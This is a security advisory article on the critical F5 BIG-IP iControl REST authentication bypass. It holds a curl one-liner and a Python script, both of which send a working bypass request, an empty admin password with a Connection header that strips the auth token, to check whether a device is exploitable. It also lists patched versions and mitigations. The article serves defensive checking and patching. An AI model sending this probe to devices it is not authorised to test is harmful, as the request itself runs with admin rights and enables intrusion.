Heads up for network administrators with F5's BIG-IP family of networking devices in their environment: a security update is available for the newly disclosed critical remote code execution vulnerability CVE-2022-1388. Several security researchers have already built working exploits, so administrators need to move quickly and secure their networks before attackers come knocking.
According to security researcher Kevin Beaumont, attackers are already attempting to exploit the flaw and are dropping webshells on compromised devices. The vulnerability is "trivial" to exploit, Horizon3 said on Twitter; Horizon3 is one of several groups that have already developed a working exploit.
The critical flaw (CVSS score 9.8) affects the BIG-IP iControl REST authentication component, F5 said on May 4. An unauthenticated attacker with network access to the iControl REST interface, through the management port or a self IP address, can bypass authentication and execute commands with elevated privileges. Attackers can use the vulnerability to gain initial access to a network and then move laterally to other systems.
Because BIG-IP devices are widely used in enterprise environments as load balancers, web application firewalls, and full proxies, the flaw potentially opens enterprise networks to a range of attacks. An adversary who controls the device could steal corporate data, install cryptominers, download and install malware and backdoors, or disrupt normal business operations by launching a ransomware attack.
Assessment: Is Your Organization Impacted?
BIG-IP is used by 48 of the Fortune 50, F5 says, and more than 16,000 BIG-IP instances are discoverable through Shodan. The vulnerability, however, is in the management plane (the iControl REST interface), not in the traffic the device proxies, so the instances exposed to attack from the Internet are those whose management interface is reachable from it. According to Rapid7 lead security researcher Jacob Baines, that puts the number of Internet-exposed vulnerable devices closer to 2,500. Devices whose management interface is reachable only from the internal network are still exploitable by anyone who already has a foothold there, so they need the update just as much.
Administrators can run the following one-line bash command from Randori to determine whether a BIG-IP instance is exploitable (replace ADDRESS with the host's IP address or hostname before running it):
HOST=ADDRESS; if curl -s https://$HOST/mgmt/tm --insecure -H "Authorization: Basic YWRtaW46" -H "X-F5-Auth-Token: 1" -H "Connection: X-Forwarded-Host, X-F5-Auth-Token" -H "Content-Length: 0" | grep -q '"items":\['; then printf "\n[*] $HOST is vulnerable\n"; else printf "\n[*] $HOST does not appear vulnerable\n"; fi
The command prints either "[*] 192.168.255.2 is vulnerable" (for example) or "[*] 192.168.255.2 does not appear vulnerable". The request carries Basic credentials for the admin user with an empty password (YWRtaW46 is the base64 encoding of "admin:") and lists X-F5-Auth-Token in the Connection header, which makes the front-end web server strip that header as hop-by-hop before proxying the request to the iControl REST back end; an unpatched back end then trusts the username without checking a password, and the resulting JSON listing of /mgmt/tm contains an "items" array. Two caveats: a positive result means the check has already executed a request as admin, so run it only against devices you are authorized to test; and a negative result can mean the device is patched or that one of the mitigations is blocking iControl REST, so it does not by itself confirm the update has been applied.
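The following Python script is an added example, not Randori's one-liner or F5 code. It sends the same probe but reports three outcomes instead of two, so that a host that refuses the request (patched, or a mitigation blocking iControl REST) is not confused with one that is unreachable, and it parses the reply as JSON rather than grepping for the string '"items":['. The sample replies at the bottom are constructed for offline use, not captured from a device, and the hosts in the usage comment are placeholders.

```python
"""CVE-2022-1388 authentication-bypass check with three-way reporting.

Added example; not Randori's one-liner and not F5 code. It sends the same
probe (Basic credentials for 'admin' with an empty password, plus a Connection
header naming X-F5-Auth-Token) and classifies the reply instead of grepping
for '"items":['. A 'vulnerable' verdict means the request already executed
as admin, so run probe() only against devices you are authorised to test.
"""
import base64
import http.client
import json
import ssl
import sys

PROBE_PATH = "/mgmt/tm"


def probe_headers() -> dict:
    """Headers of the published check (identical to the curl one-liner)."""
    creds = base64.b64encode(b"admin:").decode()  # 'YWRtaW46'
    return {
        "Authorization": f"Basic {creds}",
        "X-F5-Auth-Token": "1",
        # Naming X-F5-Auth-Token in Connection makes the front-end proxy drop
        # it as a hop-by-hop header before iControl REST sees the request.
        "Connection": "X-Forwarded-Host, X-F5-Auth-Token",
        "Content-Length": "0",
    }


def classify(status: int, body: bytes) -> str:
    """Map an HTTP status and body to a verdict.

    vulnerable   - 200 whose JSON body has an 'items' list: the request ran as admin
    refused      - any other HTTP answer (patched, or a mitigation is blocking
                   iControl REST; the check cannot tell which)
    unreachable  - no HTTP answer at all (status 0 by convention in this script)
    """
    if status == 0:
        return "unreachable"
    if status != 200:
        return "refused"
    try:
        doc = json.loads(body)
    except ValueError:
        return "refused"
    if isinstance(doc, dict) and isinstance(doc.get("items"), list):
        return "vulnerable"
    return "refused"


def probe(host: str, port: int = 443, timeout: float = 10.0) -> str:
    """Send the probe to https://host:port/mgmt/tm and classify the answer.

    http.client is used deliberately: urllib.request overwrites the Connection
    header with 'close', which would silently neutralise the probe.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # same as curl --insecure; BIG-IP ships self-signed certs
    conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    try:
        conn.request("GET", PROBE_PATH, headers=probe_headers())
        resp = conn.getresponse()
        return classify(resp.status, resp.read())
    except (OSError, http.client.HTTPException):
        return classify(0, b"")
    finally:
        conn.close()


# Constructed sample replies for offline use; not captured from a real device.
SAMPLE_LISTING = b'{"selfLink":"https://localhost/mgmt/tm","items":[{"reference":{"link":"https://localhost/mgmt/tm/ltm"}}]}'
SAMPLE_REFUSED = b'{"code":401,"message":"Authorization failed"}'

if __name__ == "__main__":
    # Usage (placeholder hosts): python3 check_cve_2022_1388.py 192.0.2.10 bigip-mgmt.example.net
    for target in sys.argv[1:]:
        print(f"[*] {target}: {probe(target)}")
```

The choice of http.client over urllib.request matters: urllib silently replaces any Connection header with "close", so a port of the one-liner built on urllib would report every host as not vulnerable.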
Apply the Security Update
F5 has released security updates for the following affected BIG-IP firmware branches:
- BIG-IP versions 16.1.0 to 16.1.2
- BIG-IP versions 15.1.0 to 15.1.5
- BIG-IP versions 14.1.0 to 14.1.4
- BIG-IP versions 13.1.0 to 13.1.4
No security update is being released for the 11.x and 12.x branches (11.6.1 to 11.6.5 and 12.1.0 to 12.1.6), which are no longer supported. Administrators running those versions should upgrade to a supported branch as soon as possible.
Apply Mitigations Where Needed
F5 has published three mitigations for cases where BIG-IP devices cannot be updated immediately. They are intended as a temporary measure only: administrators should still apply the update, or, for an unsupported firmware version, upgrade to a supported release, as soon as possible.